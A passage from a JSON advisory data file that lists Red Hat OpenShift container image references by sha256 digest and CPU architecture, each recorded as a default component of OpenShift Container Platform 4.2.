"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64 as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le as a component of Red Hat OpenShift Container Platform 4.2",
"product_id": "Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
